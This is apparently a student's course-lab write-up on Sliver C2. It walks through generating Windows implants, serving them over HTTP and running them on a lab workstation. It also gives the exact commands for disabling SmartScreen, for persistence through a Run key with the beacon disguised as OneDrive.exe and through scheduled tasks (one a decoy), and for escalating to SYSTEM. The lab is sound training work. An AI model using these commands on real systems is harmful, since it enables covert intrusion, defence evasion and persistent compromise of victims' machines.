Sliver C2 ‐ Lab - jacobwilliams100/sec-440 GitHub Wiki

Initial Setup

Initial Kali config

{6A41E9E6-B13D-4622-8C80-873273F9AE18}

{B1F05965-580C-4402-BB34-53D1A21DAB61}

update with sudo apt update

{C71B984B-2E6D-4F77-8349-6EB22653DE90}

Installing Silver C2 with sudo apt install sliver

{D651E001-69DC-4577-8932-82EEFCCA541B}

It can take a while

{49C9CCB9-1FD7-474E-B840-7856D10C7CD6}

Task 1 – Working with Sliver

1.1 Starting Sliver

open a new tab, start sliver server with the command sliver-server

{40EF1275-03CD-420E-A707-C4AEF41BB226}

we enter multiplayer mode with multiplayer

{0411B93A-5108-49B4-BF36-F646709D874D}

and we run jobs to see if the server is ready

If it looks like this, it's ready to go!

{E023DBC9-6450-4DA3-98EE-403D3617B9B2}

Deliverable #1.1 - What is the protocol and port number that the server is running on and can we change it to something different?

The server is running using tcp on port 31337.

The way I found to change port is a bit involved.

We need to edit /home/champuser/.sliver/configs/server.json

and change this value to the port that you want

image

Then we must edit the client config file /home/champuser/simlab_10.0.5.110.cfg

Change this value to your desired port

image

Reload the config files with sliver-client import /home/champuser/simlab_10.0.5.110.cfg

image

Then we need to start the server in daemon mode, which is the only way to get it to load server.json. Daemon mode works a bit differently from just normally running the command in that it provides no interactive CLI for the server application, and runs multiplayer integrally on startup rather than as a startable job because the client is the only way to access.

We do this with sliver-server daemon

image

It should hang on this command because it is treating the program like a service

Open a new terminal window and start up the client with sliver-client

image

As we can see, it connects on the new port "12345"

I feel like there is probably an easier and more convenient way to do this but I already spent a long time figuring out how to get this to work so I am moving on.

https://sliver.sh/docs?name=Multi-player+Mode

https://github.com/BishopFox/sliver/wiki/Daemon-Mode/62760f052edba557b974923b373b67ef2fa3731f

1.2 New Client

We create a new client with new-operator -n simlab -l 10.0.5.110 (don't use this IP, add your own)

image

In a new terminal tab, import the Sliver client configuration with sliver-client import /home/champuser/simlab_....

image

You should now be able to connect with sliver-client

image

Check for active sessions with sessions

image

Task 2 – Creating and Using Implants

Creating Session Implant

Create profile for session implant with profiles new --mtls 10.0.5.110 --format exe --os windows --arch amd64 windows-session

image

(make sure you use your own IP address in place of this one)

Now we will create the beacon profile with profiles new beacon --mtls 10.0.5.110 --format exe --seconds 5 --jitter 3 --os windows --arch amd64 windows-beacon

image

Deliverable 2.1 - Submit a screenshot showing the successful creation of the two profiles mentioned above. Your screenshot should show something similar to what is seen in figure 2.1

image

2.2 Generating Implants & Starting a Web Server

We use two commands to generate a session and beacon implant:

profiles generate --save ~/Public/imp1.exe windows-session

and

profiles generate --save ~/Public/beacon1.exe windows-beacon

image

Now open a third terminal and navigate to ~/Public with cd Public

image

and run the command file imp1.exe beacon1.exeto check for the implants we just created

Deliverable 2.2# - Submit a screenshot similar to what is seen in figure 2.5 that shows the type of implants you just created.

image

Webserver startup

Start up the web server with sudo python3 -m http.server 80

image

Test connection to server...

image

2.3 Preparing a Directory for Our Files

Preparing a directory for our files: run sudo mkdir /var/www/html/files to create it

Copy the two executables from ~/Public to /var/www/html/files using the command sudo cp ~/Public/*.exe /var/www/html/files

image

Let's make sure we have the proper permissions on the directory and the files with sudo chmod -R 755 /var/www/html/files/

image

Task 3 - Interacting with Our Sessions

Back on the client window, see what sessions are available with sessions

No sessions so far

image

3.1 Activating mtls Listener

On the server, activate MTLS listener with mtls

image

3.2 Downloading and Deploying Our Implants

Now, we will be testing this with the windows workstation wks1. Use it to connect to your kali VM

It didn't work because my python webserver was still running out of my Public folder

image

I needed to re-run it from /var/www/html

image

image

It worked!

Download imp1.exe

image

Your web browser may prevent you from downloading this.

image

If it doesn't work, try it in Firefox

image

Then run imp1.exe as administrator

image

You may get this warning.

image

If so, you may need to temporarily disable real-time protection

image

This worked!

image

Back on the kali system, open the client window and enter sessions once again

image

This is what we are looking for. The session with wks01 has been established!

To interact with this session, enter use [ID]

image

It will assign a codename to the session

Try running some commands to see if it can process them as wks01.

Deliverable 3.1# - Submit proof that you have connected to the victim system, this could be by running the “ifconfig” command or anything or your choice (e.g. whoami, ls, etc).

image

To avoid any issues moving forward, let's disable this Windows SmartScreen. This can be done from your sliver client using the following command:

execute -o REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off"

image

Task 4 – Persistence & Lateral Movement

4.1 Uploading the Beacon Implant

We will upload the beacon implant we created earlier to the wks01 target and disguise it as "onedrive.exe"

We will use this command:

upload '/var/www/html/files/beacon1.exe' 'C:\Users\Public\OneDrive.exe'

image

Q&A: Why did we upload the beacon.exe to the C:\Users\Public directory?

4.2 Registry - Autorun

We upload beacon.exe to the C:\Users\Public so that it is in a directory that is available to all users, meaning it stays active no matter who is logged in, increasing the persistency of the threat. Changing users will not disable the beacon.

Now we will add autorun for this .exe to the Windows Registry with the following command:

execute -o reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "OneDriveUpdater" /t REG_SZ /F /D "C:\Users\Public\OneDrive.exe"

image

Deliverable 4.1 - Submit proof that you have both tasks performed successfully.

image

We log out and log back in

image

We see that "OneDrive" has been added to the Users/Public Folder

image

And we can see that "OneDriveUpdater" has been added to the Windows Registry.

image

4.3 Scheduled Tasks

Using Scheduled tasks, We will add another persistence mechanism plus a diversion.

The diversion will be a fake scheduled network task. We will reopen the sliver shell and run:

execute -o schtasks /Create /F /SC MINUTE /MO 3 /ST 18:00 /TN PingBing /TR "cmd.exe /c ping -c 10 bing.com"

image

Now, we add configuration to run imp1.exe

We upload another copy with: upload '/var/www/html/files/imp1.exe' 'C:\Users\Public\Downloads\Checkme.exe'

image

and execute it with: execute -o schtasks /Create /F /SC MINUTE /MO 3 /ST 18:00 /TN CheckMe /TR C:\Users\Public\Downloads\Checkme.exe

image

Deliverable 4.2 - Submit proof that you have both tasks performed successfully.

In task scheduler on wks01, we can now see the PingBing fake network task we scheduled to distract their technicians

image

CheckMe is here too, but it is failing due to an unknown file location. I think its because my command to set it up lacked quote marks around the location. I just fixed it manually here.

image

image

image

Seems to be running properly now

4.4 Getting SYSTEM

We execute our privileges to SYSTEM with getsystem

image

NOTE: I needed to unjoin wks01 from the domain and repeat several of the above steps to get this to work!

This should give us access to a new system session, switch to it

image

We're in!

Deliverable 4.3 - Submit proof that you have obtained SYSTEM on your Windows system.

image

Reflection

This was probably my favorite lab yet. Until this point, we have been playing defense, learning about different ways to harden systems and respond to threats. This time, we got to play the attacker, and learn how a basis persistent threat operates. We briefly learned about persistent threats from the SolarWinds discussion board assignment during the second week of class, and I was hoping we would get to demo this type of situation. I would have appreciated a bit more guidance on deliverable 1.1, specifically the part about getting sliver-server to run on a different port. It took me a long time to figure out a way to do this, and I feel like there is probably an easier way than the one I found. Also, the third command of part 4.3 did not work properly the first time I did it because the file directory is not in quotations, so it did not include the /'s properly. The one other issue I had was that "getsystem" kept failing, and I think that had to do with the PC still being part of Active Directory. I left the domain, re-did some of the commands that were undone by this, and then it worked. Overall, I thought this was a great lab, and I am looking forward to moving on to the second part.